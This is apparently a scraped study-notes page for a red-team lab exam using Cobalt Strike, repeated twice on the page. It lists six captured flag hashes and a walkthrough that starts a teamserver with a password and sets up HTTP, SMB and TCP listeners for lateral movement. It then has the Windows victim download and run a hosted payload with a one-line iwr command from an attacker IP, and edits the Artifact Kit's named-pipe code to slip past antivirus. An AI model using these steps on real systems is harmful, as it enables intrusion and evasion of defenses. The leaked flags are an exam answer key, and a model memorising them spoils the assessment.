Sant'Anna School of Advanced Studies
BIO 2
FLAG 1 - 7b5362c02c78f6b114e5cebd24eb2bf0 FLAG 2 - eb37d7b24ae6d4640558304db2b23099 FLAG 3- ec05148d3a2e0f3b044b4573cb84674e FLAG 4- d302622334f652167456d17fa0596cff FLAG 5- 9dfe6f3301f3a3f3660f21878e7b6d9f FLAG 6- 9636a983e927a4fa950f58759cc34912 CONNECTING TO THE EXAM. Cd /opt/cobaltstrike 1- ./teamserver Passw0rd! CREATE LISTENER
...[Show More]
FLAG 1 - 7b5362c02c78f6b114e5cebd24eb2bf0 FLAG 2 - eb37d7b24ae6d4640558304db2b23099 FLAG 3- ec05148d3a2e0f3b044b4573cb84674e FLAG 4- d302622334f652167456d17fa0596cff FLAG 5- 9dfe6f3301f3a3f3660f21878e7b6d9f FLAG 6- 9636a983e927a4fa950f58759cc34912 CONNECTING TO THE EXAM. Cd /opt/cobaltstrike 1- ./teamserver Passw0rd! CREATE LISTENER – 3 listeners 1- HTTP 80 2- SMB 445 -- FOR LATERAL MOVEMENT. 3- TCP_LOCAL 1337 Starting the first instance. 1- IN KALI ATTACKING MACHINE – HOST YOUR MALICOUS PAYLOAD – IN VICTIM MACHINE WINDOWS – Download the payload . iwr -uri http://10.10.100.135:8080/gethere.exe -outfile c:\users\consultant\gethere.exe Run the following payload by Cmd.exe /c .\gethere.exe You will get your initial beacon on the cobalt BYPASS AMSI USING ARTIFACT IN KALI ls -l dist-pipe ls -l src-common/ EDIT bypass-pipe.c void start(HINSTANCE mhandle) { /* switched from snprintf... as some A/V product was flagging based on the function *sigh* */ sprintf(pipename, "%c%c%c%c%c%c%c%c%cs-%d-", 92, 92, 46, 92, 112, 105, 112, 101, 92, (int)(GetTickCount() % 9898)); /* start our server and our client */ CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&server_thread, (LPVOID) NULL, 0, NULL); client_thread(NULL)
[Show Less]